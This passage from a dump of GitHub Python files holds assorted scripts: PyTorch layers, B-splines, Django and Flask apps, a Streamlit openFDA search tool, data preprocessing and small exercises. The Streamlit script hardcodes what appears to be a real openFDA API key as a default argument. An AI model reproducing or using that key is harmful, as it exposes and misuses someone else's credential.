N(ormalization),\n D(ropout) and A(ctivation) operations. Defaults to 'NDA'.\n norm_fn (torch.nn.Module, optional): torch module used for\n normalization. Defaults to torch.nn.BatchNorm2d.\n act_fn (torch.nn.Module, optional): activation function. Defaults\n to torch.nn.PReLU.\n dropout_fn (torch.nn.Module, optional): Function used for dropout.\n Defaults to torch.nn.Dropout.\n dropout_param (float, optional): parameter for dropout. Defaults\n to 0.\n inplace (bool, optional): inplace parameter for activation\n function. 
Defaults to True.\n \"\"\"\n super().__init__()\n self.ordering = ordering\n self.norm_fn = norm_fn\n self.in_channels = in_channels\n self.act_fn = act_fn\n self.dropout_fn = dropout_fn\n self.dropout_param = dropout_param\n self.inplace = inplace\n\n self.name_dict = {\n \"A\": \"activation\",\n \"D\": \"dropout\",\n \"N\": \"normalization\",\n }\n self.init_layers()\n\n def init_layers(self):\n \"\"\"Initiates the necessary layers.\"\"\"\n if self.act_fn is None:\n self.act_fn = torch.nn.Identity\n if self.norm_fn is None:\n self.norm_fn = torch.nn.Identity\n if self.dropout_fn is None:\n self.dropout_fn = torch.nn.Identity\n\n op_dict = {\n \"A\": self.get_act_fn,\n \"D\": self.get_dropout_fn,\n \"N\": self.get_norm_fn,\n }\n\n op_list = {}\n for k in self.ordering:\n op_list[self.name_dict[k]] = op_dict[k]()\n op_list = OrderedDict(op_list)\n\n self.op = torch.nn.Sequential(op_list)\n\n def get_act_fn(self):\n try:\n return self.act_fn(inplace=self.inplace)\n except:\n return self.act_fn()\n\n def get_dropout_fn(self):\n return self.dropout_fn(self.dropout_param)\n\n def get_norm_fn(self):\n return self.norm_fn(self.in_channels)\n\n def forward(self, X: torch.Tensor) -> torch.Tensor:\n \"\"\"Forward function.\n\n Args:\n X (torch.Tensor)\n\n Returns:\n torch.Tensor\n \"\"\"\n return self.op(X)\n\n\nclass ActDropNormBuilder:\n def __init__(\n self,\n ordering: str = \"NDA\",\n norm_fn: torch.nn.Module = torch.nn.BatchNorm2d,\n act_fn: torch.nn.Module = torch.nn.PReLU,\n dropout_fn: torch.nn.Module = torch.nn.Dropout,\n dropout_param: float = 0.0,\n ):\n super().__init__()\n self.ordering = ordering\n self.norm_fn = norm_fn\n self.act_fn = act_fn\n self.dropout_fn = dropout_fn\n self.dropout_param = dropout_param\n\n self.name_dict = {\n \"A\": \"activation\",\n \"D\": \"dropout\",\n \"N\": \"normalization\",\n }\n\n def __call__(self, in_channels: int):\n return ActDropNorm(\n in_channels=in_channels,\n ordering=self.ordering,\n norm_fn=self.norm_fn,\n act_fn=self.act_fn,\n dropout_fn=self.dropout_fn,\n dropout_param=self.dropout_param,\n )\n","repo_name":"CCIG-Champalimaud/adell-mri","sub_path":"lib/modules/layers/adn_fn.py","file_name":"adn_fn.py","file_ext":"py","file_size_in_byte":5029,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"71189400693","text":"import scipy.interpolate\nimport numpy\nimport matplotlib.pyplot as plt\n\nclass BSpline:\n\n @staticmethod\n def getDefaultKnots():\n return [0, 50, 100, 200, 400, 800, 1600, 3200, 6400, 12800, 25600, 48000]\n\n def getNumBases(self):\n return self.numBases\n\n def getBasis(self, i):\n return self.bases[i]\n\n def __init__(self, grid, knots, degree = 3):\n self.degree = degree\n self.knots = list(knots)\n for i in range(degree):\n self.knots.insert(0, self.knots[0])\n self.knots.append(self.knots[-1])\n self.numBases = len(self.knots)-degree-1\n self.bases = []\n for i in range(self.numBases):\n weights = [1 if i == j else 0 for j in range(self.numBases)]\n b1 = scipy.interpolate.BSpline(self.knots, weights, degree, extrapolate=False)\n x = numpy.linspace(self.knots[i], self.knots[i + degree + 1], 100)\n self.bases.append([b1(x) if x <= self.knots[i+degree+1] and x >= self.knots[i] else 0 for x in grid])\n\n\nif __name__ == '__main__':\n degree = 3\n maxFreq = 48000\n grid = numpy.linspace(0, 48000, 1000)\n bspline = BSpline(grid, BSpline.getDefaultKnots(), 3)\n for i in range(bspline.getNumBases()):\n plt.plot(grid, bspline.getBasis(i))\n 
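# ---- [Editorial aside: standalone illustrative sketch, separate from the BSpline.py record above] ----
# The class above materialises each B-spline basis by handing scipy.interpolate.BSpline a
# one-hot weight vector over a clamped knot vector. A minimal self-contained version of that
# trick, plus a sanity check of the partition-of-unity property on the interior of the knot
# range (all names below are illustrative, not from the original file):
import numpy as np
import scipy.interpolate

degree = 3
knots = [0.0, 1.0, 2.0, 3.0, 4.0, 5.0]
full_knots = [knots[0]] * degree + knots + [knots[-1]] * degree  # clamp by repeating end knots
n_bases = len(full_knots) - degree - 1
xs = np.linspace(knots[0], knots[-1], 201)[1:-1]  # stay off the exact endpoints

bases = []
for i in range(n_bases):
    one_hot = [1.0 if j == i else 0.0 for j in range(n_bases)]
    b = scipy.interpolate.BSpline(full_knots, one_hot, degree, extrapolate=False)
    bases.append(b(xs))

# Clamped B-spline bases form a partition of unity on the interior of the knot range.
assert np.allclose(np.sum(bases, axis=0), 1.0)
# ---- [end of aside] ----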
plt.show()\n","repo_name":"gradyschofield/digital-filters","sub_path":"BSpline.py","file_name":"BSpline.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3831545021","text":"\"\"\"schoolpro URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\n\nfrom user.views import index, index_home \nfrom siteinfo.views import site_overview\nfrom attendance.views import rollcall\n\nurlpatterns = [\n url(r'^$', index, name='index'),\n url(r'^home/$', index_home, name='index_home'),\n\n url(r'^management/$', site_overview, name='overview'),\n url(r'^rollcall/$', rollcall, name='rollcall'),\n\n url(r'^attendance/', include('attendance.urls', namespace=\"attendance\")),\n url(r'^booking/', include('booking.urls', namespace=\"booking\")),\n url(r'^classroom/', include('classroom.urls', namespace=\"classroom\")),\n url(r'^facilities/', include('facilities.urls', namespace=\"facilities\")),\n url(r'^inbox/', include('inbox.urls', namespace=\"inbox\")),\n url(r'^report/', include('report.urls', namespace=\"report\")),\n url(r'^siteinfo/', include('siteinfo.urls', namespace=\"siteinfo\")),\n url(r'^timetable/', include('timetable.urls', namespace=\"timetable\")),\n url(r'^user/', include('user.urls', namespace=\"user\")),\n\n url(r'^admin/', admin.site.urls),\n]\n","repo_name":"AndyUT101/myproject","sub_path":"schoolpro/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13250208714","text":"# run.py\n\nimport os\nfrom os import environ\nfrom myApp import create_app\nfrom flask import render_template\nfrom flask import request\n\n\nos.environ[\"FLASK_CONFIG\"] = \"sandbox\"\n#os.environ[\"FLASK_APP\"] = \"runserver.py\"\nconfig_name = os.getenv('FLASK_CONFIG')\nprint('@@@@ENV@@@',config_name)\n\n# Example configuration\n#ENVIRONMENT_DEBUG = os.environ.get(\"DEBUG\", default=False)\n#if ENVIRONMENT_DEBUG.lower() in (\"f\", \"false\"):\n# ENVIRONMENT_DEBUG = False\n#DEBUG = ENVIRONMENT_DEBUG\n#SECRET_KEY = os.environ.get(\"SECRET_KEY\", default=None)\n#if not SECRET_KEY:\n# raise ValueError(\"No secret key set for Flask application\")\n\n#config_name = 'sandbox'\napp = create_app(config_name)\n\n###############################################\n@app.errorhandler(404)\ndef page_not_found(e):\n varPageName1 = str(request._get_current_object())\n return render_template('404.html'), 404\n###############################################\n\nif __name__ == '__main__':\n HOST = environ.get('SERVER_HOST', 'localhost')\n try:\n PORT = int(environ.get('SERVER_PORT', '5555'))\n except ValueError:\n PORT = 5555\n\n app.run(HOST, 
PORT)","repo_name":"ganimidesifestionas/ganimedes_alpha","sub_path":"ganimedes/runserver.py","file_name":"runserver.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24109695761","text":"import streamlit as st\nimport pandas as pd\nfrom datetime import datetime, timedelta\nimport subprocess\nimport openFDA_parser\nimport sys\nimport json\nimport math\nimport requests\n\ndef fetch_fda_data(query, database='event', count=False, field_count='', limit=1000, api_key='WuFW3nIY42Jq1SR9STTbDlQOfYNORGfeHsk5FFU9'):\n base_url = f'https://api.fda.gov/device/{database}.json?api_key={api_key}&search='\n\n try:\n if count:\n url = f'{base_url}{query}&count={field_count}'\n else:\n meta_url = f'{base_url}{query}'\n json_re = requests.get(meta_url).json()\n number_results = json_re['meta']['results']['total']\n\n if number_results == 0:\n st.warning(\"The search query returned 0 results. Please try a different query.\")\n return None, None, None, 0 # Return zero results\n\n urls = [f'{base_url}{query}&limit={limit}&skip={1000 * i}' for i in range(math.ceil(number_results / 1000))] if number_results > 1000 else [f'{base_url}{query}&limit={limit}&skip=0']\n\n data = []\n for url in urls:\n response = requests.get(url)\n response.raise_for_status() # Raise an error for non-OK responses\n unique_json = json.loads(response.text)['results']\n data.extend(unique_json)\n\n with open('openFDA_raw_data.json', 'w') as f:\n json.dump(data, f, indent=5)\n\n last_updated = json_re['meta']['last_updated']\n n_results = number_results\n\n return data, database, last_updated, n_results\n\n except requests.exceptions.RequestException as e:\n st.error(f\"Error: {str(e)}\")\n return None, None, None, str(e) # Return the error message as a string\n except KeyError:\n st.error(\"Error: Unexpected response format from openFDA API.Please try other keywords\")\n return None, None, None, \"None\"\n\ndef search_data(query, database, from_date, to_date):\n data, database, last_updated, n_results = fetch_fda_data(query=query, database=database)\n \n parser_functions = {\n 'event': openFDA_parser.parser_event,\n '510k': openFDA_parser.parser_510k,\n 'udi': openFDA_parser.parser_udi,\n 'recall': openFDA_parser.parser_recalls\n }\n \n df = pd.DataFrame(parser_functions.get(database, lambda data: [])(data))\n \n return df, database, last_updated, n_results\n\n# Set Streamlit app title and layout\nst.set_page_config(layout=\"wide\")\ncol1, col2, col3 = st.columns([2, 2, 1])\nst.title('Search openFDA Database')\nst.sidebar.title('Settings')\n\n# Initialize session state\nif 'df' not in st.session_state:\n st.session_state.df = None\n\nif 'plot_container' not in st.session_state:\n st.session_state.plot_container = None\n\n# Add query input\nquery = st.sidebar.text_input('Query', '')\nif not query:\n st.warning('Please enter a query.')\n st.stop()\n\n# Add database selection\ndatabase = st.sidebar.selectbox('Database', ['event', '510k', 'udi', 'recall'])\n\n# Add date range selection\nfrom_date = st.sidebar.date_input('From Date (YYYY-MM-DD)', datetime.today() - timedelta(days=365.25 * 5))\nto_date = st.sidebar.date_input('To Date (YYYY-MM-DD)', datetime.today())\n\n# Add search button\nsearch_button = st.sidebar.button('Search')\n\nif search_button:\n # If date range is specified, add it to the search query\n if from_date and to_date:\n date_filter = f'+AND+[{from_date.strftime(\"%Y-%m-%d\")}+TO+{to_date.strftime(\"%Y-%m-%d\")}]'\n 
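# ---- [Editorial aside: standalone illustrative sketch, separate from the GUI_search.py record above] ----
# fetch_fda_data() above pages through large result sets by issuing one request per
# 1000-record window via limit/skip query parameters. The same pattern in isolation; the
# endpoint shape, key names and page size here are illustrative assumptions, not the real
# openFDA contract:
import math
import requests

def fetch_paged(base_url: str, total: int, page_size: int = 1000) -> list:
    """Collect `total` records, one GET per `page_size` window."""
    records = []
    for page in range(math.ceil(total / page_size)):
        url = f"{base_url}&limit={page_size}&skip={page_size * page}"
        response = requests.get(url, timeout=30)
        response.raise_for_status()  # fail loudly instead of parsing an error page
        records.extend(response.json()["results"])
    return records
# ---- [end of aside] ----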
query += date_filter\n\n df, saved_database, last_updated, n_results = search_data(query, database, from_date, to_date)\n\n csv_path = f'saved_csv/{database}_data.csv'\n\n try:\n df.to_csv(csv_path, sep='|', encoding='UTF-8')\n except Exception as e:\n st.error(f\"Error saving CSV file: {str(e)}\")\n st.stop() # Stop execution if there's an error\n\n col1.success(f\"Search for openFDA in {saved_database} database is completed.\")\n\n col3.metric(label=\"Number of Results\", value=n_results)\n col3.metric(label=\"Last Updated\", value=last_updated)\n\n col2.download_button(label=\"Download CSV\", data=df.to_csv(index=False), key='download_csv', file_name=f'{database}_data.csv', mime='text/csv')\n\n # Store the DataFrame in session state\n st.session_state.df = df\n\n# Function to execute event_plot.py\ndef execute_event_plot():\n virtualenv_python = sys.executable # Get the path to the currently running Python executable\n script_path = \"Misc/event_plot.py\"\n subprocess.run([virtualenv_python, script_path])\n\n# Create a button to execute the script if the selected database is \"event\"\nif database == 'event' and st.button(\"Execute event_plot.py\"):\n execute_event_plot()\n st.success(\"event_plot.py executed successfully!\")\n\n# Display the main window\nst.sidebar.write(\"[Go back to Search Page](#settings)\")\n","repo_name":"KhalilAMARDJIA/open_FDA","sub_path":"GUI_search.py","file_name":"GUI_search.py","file_ext":"py","file_size_in_byte":4878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28278092860","text":"from common.caching import read_input_dir, cached\nfrom common.dataio import get_aps_data_hdf5, get_passenger_clusters\n\nimport numpy as np\nimport skimage.transform\nimport glob\nimport os\nimport tqdm\nimport h5py\nimport pickle\nimport imageio\nimport skimage.measure\nimport cv2\n\n\nSEGMENTATION_COLORS = np.array([[255, 0, 0], [255, 0, 255], [0, 0, 255]])\n\n\ndef _get_mask(image, color):\n mask = np.all(image[..., :3] == color, axis=-1)\n mask = np.stack(np.split(mask, 16, axis=1), axis=-1)\n return mask\n\n\n@cached(get_aps_data_hdf5, version=2, subdir='ssd')\ndef get_threat_heatmaps(mode):\n if not os.path.exists('done'):\n names, labels, x = get_aps_data_hdf5(mode)\n f = h5py.File('data.hdf5', 'w')\n th = f.create_dataset('th', x.shape + (3,))\n\n with read_input_dir('hand_labeling/threat_segmentation/base'):\n for i, (name, label, data) in tqdm.tqdm(enumerate(zip(names, labels, x)), total=len(x)):\n files = glob.glob(name + '*')\n assert files, 'missing hand segmentation for %s' % name\n\n image = imageio.imread(files[0])\n masks = [_get_mask(image, SEGMENTATION_COLORS[ci]) for ci in range(3)]\n with read_input_dir('hand_labeling/threat_segmentation/revision_v0'):\n for revision in glob.glob(name + '*'):\n rlabel = int(revision.split('_')[1].split('.')[0])\n rci = [i+1 for i in range(17) if label[i]].index(rlabel)\n rimage = imageio.imread(revision)\n masks[rci] = _get_mask(rimage, SEGMENTATION_COLORS[0])\n\n th[i] = np.stack(masks, axis=-1)\n\n open('done', 'w').close()\n else:\n f = h5py.File('data.hdf5', 'r')\n th = f['th']\n return th\n\n\n@cached(get_threat_heatmaps, version=8, subdir='ssd', cloud_cache=True)\ndef get_augmented_threat_heatmaps(mode):\n if not os.path.exists('done'):\n th_in = get_threat_heatmaps(mode)\n f = h5py.File('data.hdf5', 'w')\n th = f.create_dataset('th', (len(th_in), 16, 660, 512, 6))\n\n def segmentation_mask(masks):\n ret = np.zeros((16, 660, 512, 2))\n for i in 
range(16):\n for j in range(3):\n cur = masks[..., i, j]\n if not cur.any():\n continue\n ret[i, ..., 0] += cur / np.max(cur)\n ret[i, ..., 1] += cur / np.sum(cur)\n return ret\n\n def com_mask(masks):\n ret = np.zeros((16, 660, 512, 2))\n for i in range(16):\n for j in range(3):\n cur = masks[..., i, j]\n if not cur.any():\n continue\n M = skimage.measure.moments(cur.astype('double'))\n xb, yb = M[0, 1]/M[0, 0], M[1, 0]/M[0, 0]\n cov = np.array([[16, 0], [0, 16]])\n covinv = np.linalg.inv(cov)\n mean = np.array([xb, yb])\n gx, gy = np.meshgrid(np.arange(512), np.arange(660))\n g = np.reshape(np.stack([gy, gx], axis=-1), (-1, 2))\n g = np.exp(-0.5*np.sum((g-mean).dot(covinv)*(g-mean), axis=1))\n g = np.reshape(g, (660, 512))\n ret[i, ..., 0] += g / np.max(g)\n ret[i, ..., 1] += g / np.sum(g)\n return ret\n\n def distance_mask(masks):\n ret = np.zeros((16, 660, 512, 2))\n for i in range(16):\n for j in range(3):\n cur = (masks[..., i, j]*255).astype('uint8')\n if not cur.any():\n continue\n g = cv2.distanceTransform(cur, cv2.DIST_L2, cv2.DIST_MASK_PRECISE)\n ret[i, ..., 0] += g / np.max(g)\n ret[i, ..., 1] += g / np.sum(g)\n return ret\n\n mean = np.zeros(6)\n for i, data in enumerate(tqdm.tqdm(th_in)):\n th[i, ..., 0:2] = segmentation_mask(data)\n th[i, ..., 2:4] = com_mask(data)\n th[i, ..., 4:6] = distance_mask(data)\n mean += np.mean(th[i], axis=(0, 1, 2)) / len(th)\n\n np.save('mean.npy', mean)\n f.close()\n open('done', 'w').close()\n\n f = h5py.File('data.hdf5', 'r')\n th = f['th']\n mean = np.load('mean.npy')\n return th, mean\n\n\n@cached(get_aps_data_hdf5, get_threat_heatmaps, version=0, subdir='ssd')\ndef get_data_and_threat_heatmaps(mode):\n names, labels, x = get_aps_data_hdf5(mode)\n if not os.path.exists('done'):\n th = get_threat_heatmaps(mode)\n f = h5py.File('data.hdf5', 'w')\n dset = f.create_dataset('dset', x.shape + (4,))\n for i, (data, hmap) in tqdm.tqdm(enumerate(zip(x, th)), total=len(x)):\n dset[i] = np.concatenate([data[..., np.newaxis], hmap], axis=-1)\n open('done', 'w').close()\n else:\n f = h5py.File('data.hdf5', 'r')\n dset = f['dset']\n return names, labels, dset\n\n\n@cached(get_data_and_threat_heatmaps, version=0)\ndef sanity_check_threat_heatmaps(mode):\n names, labels, dset = get_data_and_threat_heatmaps(mode)\n for name, label, data in tqdm.tqdm(zip(names, labels, dset), total=len(dset)):\n th = data[..., 1:]\n has_t = np.any(th, axis=(0, 1, 2))\n if np.sum(has_t) != sum(label):\n print('heatmaps from %s does not match label' % name)\n","repo_name":"suchir/passenger_screening_algorithm_challenge","sub_path":"model_v2/dataio.py","file_name":"dataio.py","file_ext":"py","file_size_in_byte":5466,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"8133384861","text":"from flask import Flask, render_template, url_for, flash, redirect, request, Blueprint, flash, session, jsonify, current_app\nfrom forms import UploadPDFForm\nfrom flask_sqlalchemy import SQLAlchemy\nfrom pdfminer.high_level import extract_text\nimport threading, queue, json, time, os, secrets, re\n\n\n\ndb = SQLAlchemy()\n\n\ndef create_app():\n app = Flask(__name__)\n app.config['SECRET_KEY'] = os.environ.get(\"SECRET_KEY\")\n # app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///site.db'\n app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///site.db'\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n # db = SQLAlchemy(app)\n db.init_app(app)\n return app\n\n\napp = create_app()\n\n\nglobal raw_text\nraw_text = []\nglobal 
split_text\nsplit_text = []\nglobal firstCut\nfirstCut = []\nglobal secondCut\nsecondCut = []\nglobal thirdCutList\nthirdCutList = []\nglobal data\ndata = []\nglobal dataSession\ndataSession = \"\"\n\n\ndef save_pdf(pdf_form):\n    f_name, f_ext = os.path.splitext(pdf_form.filename)\n    pdf_fn = f_name + f_ext\n    # the line below is for the local version\n    # pdf_path = os.path.join(app.root_path, 'static/user_pdf', pdf_fn)\n    pdf_path = os.path.join(app.root_path, 'tmp')\n    pdf_form.save(pdf_path)\n\n    return pdf_path\n\n\ndef tittle_of_book(pdf_form):\n    parts = []\n    f_name, f_ext = os.path.splitext(pdf_form.filename)\n    pdf_fn = f_name + f_ext\n    ready_tittle = pdf_fn[:-4]\n    ready_tittle_pretty_cut = ready_tittle.replace(\"_\", \" \")\n    pretty_tittle = ready_tittle_pretty_cut.replace(\"  \", \" \")\n    return pretty_tittle\n\n\ndef convert_pdf_to_txt(path):\n    text = extract_text(path)\n    raw_text.append(text)\n\n\ndef split(lista):\n    for i in lista:\n        split = i.split(\" \")\n        split_text.append(split)\n\n\ndef first_text_clean(lista):\n    for i in lista[0]:\n        if \"\\n\" in i:\n            cut = i.replace('\\n', ' ')\n            firstCut.append(cut)\n        elif i == \"\\n\":\n            continue\n        else:\n            firstCut.append(i)\n\n\ndef second_text_clean(lista):\n    for i in lista:\n        if re.search(r\"(\\s)\", i, re.I):\n            cut = re.split(r\"(\\s)\", i)\n            for j in cut:\n                secondCut.append(j)\n        else:\n            secondCut.append(i)\n\n\ndef third_text_clean(lista):\n    for i in lista:\n        if re.match(r\"(\\s)\", i):\n            continue\n        elif i == '':\n            continue\n        else:\n            thirdCutList.append(i)\n\n\ndef clearLists():\n    global raw_text\n    raw_text = []\n    global split_text\n    split_text = []\n    global firstCut\n    firstCut = []\n    global secondCut\n    secondCut = []\n    global thirdCutList\n    thirdCutList = []\n    global data\n    data = []\n    global dataSession\n    dataSession = []\n    print(\"Lists cleared\")\n    print(dataSession)\n\n\n@app.route('/', methods=['GET', 'POST', 'PUT'])\n@app.route('/home', methods=['GET', 'POST','PUT'])\ndef home():\n    # The function below clears the lists before new text is loaded into them\n    clearLists()\n    print(\"home url is: \" + request.url)\n\n    form = UploadPDFForm()\n    if form.validate_on_submit():\n        if form.pdfFile.data:\n            pdf_file = save_pdf(form.pdfFile.data)\n            bookTittle = tittle_of_book(form.pdfFile.data)\n            session['my_var'] = pdf_file\n            session['bookTittle'] = bookTittle\n            \n            return redirect(url_for('loadingPage'))\n        \n\n    return render_template('home.html', title='Upload page', form=form)\n\n\n\n@app.route('/about', methods=['GET', 'POST', 'PUT'])\ndef about():\n    return render_template('about.html', title='About')\n\n\n@app.route('/loadReader', methods=['GET', 'POST', 'PUT'])\ndef loadReader():\n    bookTittle = \"\"\n    data = []\n    return render_template('loadReader.html', title='Web_Reader', data=json.dumps(data), bookTitle = json.dumps(bookTittle))\n\n\n@app.route('/status')\ndef thread_status():\n    \"\"\" Return the status of the worker thread \"\"\"\n    global dataSession\n    return jsonify(dict(status=('finished' if len(dataSession) > 1 else 'running')))\n\n\n# Queue to handle threads\nglobal q\nq = queue.Queue()\n\n\n@app.route('/loadingPage', methods=['GET', 'POST', 'PUT'])\ndef loadingPage():\n    my_var = session.get('my_var', None)\n    bookTittle = session.get('bookTittle', None)\n    global q\n    \n    def fillLists():\n        \n        # 3rd try; this works locally but does not work on Heroku\n        with app.test_request_context():\n            print(request.url)\n            print(threading.enumerate())\n            threading.currentThread().setName(bookTittle) \n            newThread = threading.currentThread().getName()\n            q.put(newThread)\n            # q.queue creates a deque object (a copy of q) that allows peeking into q\n            deque = q.queue\n            print(\"backgroundRun started\")\n            print(\"Number of running threads: \" + str(threading.active_count()))\n            print(\"\")\n            print(threading.currentThread().getName())\n            print(q.qsize())\n            print(\"Last elem in q is: \" + deque[-1])\n            print(deque)\n            convert_pdf_to_txt(my_var)\n            print(threading.currentThread().getName() + \" converting pdf done\")\n            if q.empty():\n                os.remove(my_var)\n                print(\"Q empty, elem does nothing\")\n                return\n            if threading.currentThread().getName() != deque[-1]:\n                global raw_text\n                raw_text = []\n                os.remove(my_var)\n                print(\"raw_text cleared\")\n                print(threading.currentThread().getName())\n                print(\"Last elem in q is: \" + deque[-1])\n                print(deque)\n                return\n            if threading.currentThread().getName() == deque[-1] and split_text != []:\n                print(threading.currentThread().getName() + \" thread finished without action\")\n                os.remove(my_var)\n                return\n            if threading.currentThread().getName() == deque[-1]:\n                print(request.url)\n                if request.url == \"https://fastpdfreader.herokuapp.com\":\n                    print(threading.currentThread().getName() + \" finished working and did nothing\")\n                    os.remove(my_var)\n                    return\n                else:\n                    split(raw_text)\n                    first_text_clean(split_text)\n                    second_text_clean(firstCut)\n                    third_text_clean(secondCut)\n                    global dataSession\n                    dataSession = thirdCutList\n                    os.remove(my_var)\n                    print(threading.currentThread().getName() + \" run at finish line\")\n                    with q.mutex:\n                        q.queue.clear()\n                    print(deque)\n            \n            return\n\n    \n    backgroundRun = threading.Thread(target=fillLists)\n    backgroundRun.daemon = True\n    backgroundRun.start()\n    \n\n    return render_template('loadingPage.html', title='Loading')\n\n
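# ---- [Editorial aside: standalone illustrative sketch, separate from the run.py record above] ----
# The /loadingPage route above pushes the slow PDF-to-text work onto a background daemon
# thread, while /status polls shared state to see whether it has finished. The same
# fill-and-poll pattern reduced to its core (all names below are illustrative):
import threading
import time

result: list = []              # shared state the worker fills in
lock = threading.Lock()

def worker(payload: str) -> None:
    time.sleep(0.5)            # stand-in for the slow conversion step
    with lock:
        result.append(payload.upper())

def status() -> str:
    with lock:
        return "finished" if result else "running"

t = threading.Thread(target=worker, args=("some text",), daemon=True)
t.start()
print(status())                # usually "running" while the worker sleeps
t.join()
print(status())                # "finished"
# ---- [end of aside] ----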
Have a nice read.', \"success\")\n\n return render_template('reader.html', title='Web Reader', data=json.dumps(dataSession), bookTitle = json.dumps(bookTittle))\n\n\n#command to check how many free dyno hours i have left:\n# heroku ps -a fastpdfreader \n\n\n# if __name__ == \"__main__\":\n# app.run(debug=True)\n\nif __name__ == \"__main__\":\n app.run()","repo_name":"WKR92/FastPDFReaderOnline","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":7532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17516844530","text":"# 출력 출발 노드에서 최소 몇 개 간선을 지나면 도착 노드에 갈 수 있는지\n# 입력을 그래피로 정리\n# bfs 로 도착 노드 찾기\n\nimport sys\nfrom pprint import pprint\nsys.stdin = open('input.txt')\n\ndef bfs():\n visited = [0] * (V+1)\n Q = []\n Q.append(S)\n visited[S] = 1\n while Q:\n node = Q.pop(0)\n for i in range(V+1):\n if graph[node][i] == 1 and visited[i] == 0:\n visited[i] = visited[node] + 1\n Q.append(i)\n if visited[G]:\n return visited[G] - 1\n else:\n return 0\n\nT = int(input())\n\nfor tc in range(1, T + 1):\n V, E = map(int, input().split())\n arr = [list(map(int, input().split())) for _ in range(E)]\n S, G = map(int, input().split())\n graph = [[0]*(V+1) for _ in range(V+1)]\n for edge in arr:\n graph[edge[0]][edge[1]] = 1\n graph[edge[1]][edge[0]] = 1\n\n rlt = bfs()\n print(f'#{tc} {rlt}')","repo_name":"Sangtaek-Lee/Algorithm","sub_path":"problem/0328평가대비/5102_node_distance_bfs/sol1.py","file_name":"sol1.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14482086057","text":"# import package\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.model_selection import GridSearchCV , KFold\r\nfrom sklearn.svm import SVR\r\n\r\n# read train data and test data\r\ndf=pd.read_csv(\"training_data.csv\")\r\ndf_test=pd.read_csv(\"test_data.csv\")\r\n\r\n#make text become array\r\ntext=df.text.values\r\nnew_text=df_test.text.values\r\ny=df.stars.values\r\n\r\n#Let the review_id , business_id and user_id become 0~1\r\nid_train=(df.iloc[:,:3]-df.iloc[:,:3].min())/(df.iloc[:,:3].max()-df.iloc[:,:3].min())\r\nid_test=(df_test.iloc[:,:3]-df_test.iloc[:,:3].min())/(df_test.iloc[:,:3].max()-df_test.iloc[:,:3].min())\r\n\r\n#use the tfidfvectorizer package and encode the text\r\nvectorizer=TfidfVectorizer(max_df=0.8,min_df=3).fit(text)\r\ntext=vectorizer.transform(text)\r\nfea=vectorizer.transform(new_text)\r\n\r\n#Let the correcting id and encoding text become array from\r\ntextid=pd.DataFrame(id_train)\r\ntextname=pd.DataFrame(text.toarray())\r\ntext=pd.concat([textid,textname],axis=1)\r\ntext=text.values\r\nnewid,newname=pd.DataFrame(id_test),pd.DataFrame(fea.toarray())\r\nfea=pd.concat([newid,newname],axis=1)\r\nfea=fea.values\r\n\r\n#Select the best parameters of the module SVM\r\nparam_grid={\"C\":[0.1,1,10],\"gamma\":[0.1,1,10]}\r\ncv=KFold(shuffle=True)\r\ngrid=GridSearchCV(SVR(),param_grid=param_grid,cv=cv,verbose=3)\r\n\r\n#Let the GridSearchCV fit the text and predict the stars\r\ngrid.fit(text,y)\r\npred=grid.predict(fea)\r\n\r\n#Decide the stars num >5 and <1 become 5 and 1\r\nfor i in range(len(pred)):\r\n\tif pred[i]>5 :\r\n\t\tpred[i]=5\r\n\telif pred[i]<1 :\r\n\t\tpred[i]=1\r\n\r\n#Write the predict data into 
csv\r\ncs=pd.DataFrame({\"aa\":df_test.iloc[:,0],'bb':pred})\r\ncs.to_csv(\"pred.csv\",index=False,header=False)\r\n\r\n\r\n","repo_name":"h24054043/Rating-Prediction-with-User-Business-Review","sub_path":"cp2.py","file_name":"cp2.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"11821974737","text":"# Perguntar Salário de um funcionário\n# calcular valor do aumento\n# Salários superiores a R$1250 calcular aumento de 10%\n# para inferiores ou iguais aumento de 15%\n\nsal = float(input('Digite seu salário:').strip())\nif sal > 1250:\n print('Seu novo salário será: R${:.2f}'.format((sal*0.10)+sal))\nelse:\n print('Seu novo salário será:R${:.2f}'.format((sal*0.15)+sal))","repo_name":"Filipe-Amorim1/Scripts-Python","sub_path":"Aula09/Desafio34aula10salario.py","file_name":"Desafio34aula10salario.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1494642317","text":"class Comment:\n def __init__(self, username, content, likes=0):\n self.username = username\n self.content = content\n 